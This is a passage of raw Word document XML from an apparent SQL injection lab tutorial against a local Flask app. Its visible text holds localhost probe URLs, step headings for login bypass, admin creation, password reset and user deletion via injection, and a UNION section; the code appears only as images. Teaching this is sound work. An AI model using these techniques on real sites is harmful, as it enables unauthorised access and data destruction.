    <w:p w14:paraId="08CB78EF" w14:textId="44FD1255" w:rsidR="00094BF9" w:rsidRDefault="00094BF9" w:rsidP="000D38F0">
      <w:r w:rsidRPr="00094BF9">
        <w:t>Math expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00BE5467" w:rsidRPr="00AD4DB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/page?id=1+1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C6DF7BE" w14:textId="14BF3763" w:rsidR="00BE5467" w:rsidRDefault="00BE5467" w:rsidP="000D38F0">
      <w:r w:rsidRPr="00BE5467">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BC9408" wp14:editId="1409EA29">
            <wp:extent cx="5731510" cy="2663825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="15744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7388" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2663825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73967FA2" w14:textId="7CF3A22A" w:rsidR="006F02C7" w:rsidRDefault="006F02C7" w:rsidP="000D38F0">
      <w:r w:rsidRPr="006F02C7">
        <w:t>ASCII-style logic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, visit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00AD4DB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5000/page?id=67-65</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FBF00D0" w14:textId="38E3D3D7" w:rsidR="006F02C7" w:rsidRDefault="006F02C7" w:rsidP="006F02C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006F02C7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1742AF48" wp14:editId="744B1E44">
            <wp:extent cx="4725059" cy="1333686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181423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32079" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4725059" cy="1333686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3FE9D" w14:textId="77777777" w:rsidR="004564AE" w:rsidRDefault="004564AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="251BD668" w14:textId="1961A547" w:rsidR="00F45F8D" w:rsidRPr="004564AE" w:rsidRDefault="004564AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004564AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injecting into Different Statement Types</w:t>
      </w:r>
      <w:r w:rsidR="00FA40B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB97F4" w14:textId="40D7DC2B" w:rsidR="00B53E69" w:rsidRDefault="00F45F8D" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Init_db.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557081A6" w14:textId="3EDF1786" w:rsidR="00F45F8D" w:rsidRDefault="00F45F8D" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F45F8D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F965429" wp14:editId="0F9ACDDA">
            <wp:extent cx="5731510" cy="3380105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7665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77996" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3380105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C46018" w14:textId="34AA76FC" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A968F99" w14:textId="68829CA0" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364D41">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75BF91CB" wp14:editId="0198C427">
            <wp:extent cx="5731510" cy="3966210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="178028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3199" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3966210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE49C5" w14:textId="238AD84B" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364D41">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20987550" wp14:editId="2136AC8F">
            <wp:extent cx="5731510" cy="4012565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="200936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7760" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4012565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B56AA" w14:textId="05037AF7" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364D41">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7191174A" wp14:editId="6C21E9A0">
            <wp:extent cx="5731510" cy="3058160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="4898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9758" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3058160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B156D97" w14:textId="4989D074" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364D41">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470EC443" wp14:editId="42503503">
            <wp:extent cx="5731510" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="70702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4340" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DAACA" w14:textId="04B03BF3" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7FE51" w14:textId="7BCCA060" w:rsidR="00364D41" w:rsidRDefault="00364D41" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00364D41">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74316CF8" wp14:editId="0C823567">
            <wp:extent cx="5731510" cy="1374140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10880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2228" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1374140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB4C870" w14:textId="7B27D637" w:rsidR="0094343C" w:rsidRDefault="00E444D2" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCEB9A2" w14:textId="14FE477F" w:rsidR="00E444D2" w:rsidRDefault="00E444D2" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E444D2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A09931F" wp14:editId="70C0D5EE">
            <wp:extent cx="5731510" cy="1948815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2795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06749" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1948815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062BC6E" w14:textId="21622E9B" w:rsidR="00E444D2" w:rsidRDefault="00E444D2" w:rsidP="00421CBC">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step1: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E444D2">
        <w:t>SELECT injection (login bypass)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B7D16" w14:textId="1BD1B3CA" w:rsidR="00367FF7" w:rsidRDefault="00367FF7" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367FF7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56EB01BB" wp14:editId="3E54EC57">
            <wp:extent cx="5731510" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="213441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6201" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1120140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB3F187" w14:textId="77777777" w:rsidR="00367FF7" w:rsidRDefault="00367FF7" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B2DAFD" w14:textId="574BF1A6" w:rsidR="00367FF7" w:rsidRDefault="00367FF7" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00367FF7">
        <w:t>INSERT injection (create admin)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69DD38" w14:textId="58CD9B88" w:rsidR="00367FF7" w:rsidRDefault="00367FF7" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00367FF7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D4A598" wp14:editId="21487A0D">
            <wp:extent cx="5731510" cy="2802890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="74428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5943" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2802890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE1A2C9" w14:textId="07B59B93" w:rsidR="004C76DF" w:rsidRDefault="004C76DF" w:rsidP="00421CBC">
      <w:r w:rsidRPr="004C76DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step3: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="004C76DF">
        <w:t>UPDATE injection (reset all passwords))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB2DAF" w14:textId="42ECF72F" w:rsidR="00934C01" w:rsidRDefault="00934C01" w:rsidP="00421CBC">
      <w:r w:rsidRPr="00934C01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D38FF5" wp14:editId="33AD2D91">
            <wp:extent cx="5731510" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="48233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37664" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="781050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B63DE" w14:textId="6559BBBB" w:rsidR="00E1734C" w:rsidRDefault="00E1734C" w:rsidP="00421CBC">
      <w:r>
        <w:t xml:space="preserve">Step4: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1734C">
        <w:t>DELETE injection (delete all users)</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304E73B" w14:textId="6BEDC99C" w:rsidR="00181880" w:rsidRDefault="00181880" w:rsidP="00421CBC">
      <w:r w:rsidRPr="00181880">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C5C4B34" wp14:editId="7062920E">
            <wp:extent cx="5731510" cy="1103630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="205262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5593" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1103630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732ACC4" w14:textId="77777777" w:rsidR="00FF0E3B" w:rsidRDefault="00FF0E3B" w:rsidP="00421CBC"/>
    <w:p w14:paraId="7BD706EE" w14:textId="7324C4EE" w:rsidR="00FF0E3B" w:rsidRDefault="00FF0E3B" w:rsidP="00FF0E3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The UNION Operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C24C8F" w14:textId="77777777" w:rsidR="006A6D8D" w:rsidRPr="006A6D8D" w:rsidRDefault="006A6D8D" w:rsidP="006A6D8D">
      <w:r w:rsidRPr="006A6D8D">
        <w:t>UNION is powerful because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FFE296" w14:textId="77777777" w:rsidR="006A6D8D" w:rsidRPr="006A6D8D" w:rsidRDefault="006A6D8D" w:rsidP="006A6D8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6D8D">
        <w:t>It lets attackers run extra queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4901F" w14:textId="77777777" w:rsidR="006A6D8D" w:rsidRPr="006A6D8D" w:rsidRDefault="006A6D8D" w:rsidP="006A6D8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6D8D">
        <w:t>It can expose completely different tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839EA5F" w14:textId="77777777" w:rsidR="006A6D8D" w:rsidRPr="006A6D8D" w:rsidRDefault="006A6D8D" w:rsidP="006A6D8D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6D8D">
        <w:t>The website often can’t tell the difference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A19A6" w14:textId="57A02AC4" w:rsidR="006A6D8D" w:rsidRDefault="006A6D8D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668C194" w14:textId="22F52D3B" w:rsidR="00FF0E3B" w:rsidRDefault="0018773F" w:rsidP="00421CBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018773F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UNION injection step by step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22726C" w14:textId="6EFA2980" w:rsidR="008A2A1E" w:rsidRDefault="008A2A1E" w:rsidP="00421CBC">
      <w:r>
        <w:t>Setup_db.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584971D" w14:textId="6456A5C5" w:rsidR="008A2A1E" w:rsidRDefault="008A2A1E" w:rsidP="001B5446">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008A2A1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6216ECB8" wp14:editId="035E14EA">
            <wp:extent cx="5092700" cy="3569855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72346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68919" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5100480" cy="3575309"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3C1A8" w14:textId="51ECCFC4" w:rsidR="00FE2030" w:rsidRDefault="00FE2030" w:rsidP="00421CBC">
      <w:r>
        <w:t>App.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF27B6" w14:textId="20322866" w:rsidR="00FE2030" w:rsidRDefault="00FE2030" w:rsidP="001B5446">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2030">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4495C4" wp14:editId="696EA364">
            <wp:extent cx="5731510" cy="4290060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="114028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83959" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4290060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4D00A" w14:textId="77210EC7" w:rsidR="00341B58" w:rsidRDefault="00341B58" w:rsidP="00341B58">
      <w:r w:rsidRPr="00341B58">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A40E905" wp14:editId="138FF9AA">
            <wp:extent cx="5731510" cy="872490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="27311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15355" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="872490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCFD405" w14:textId="7C7A5320" w:rsidR="00C061B7" w:rsidRDefault="00C061B7" w:rsidP="00341B58">
      <w:r>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF22286" w14:textId="726A1975" w:rsidR="00C061B7" w:rsidRDefault="00C061B7" w:rsidP="00341B58">
      <w:r w:rsidRPr="00C061B7">
        <w:rPr>
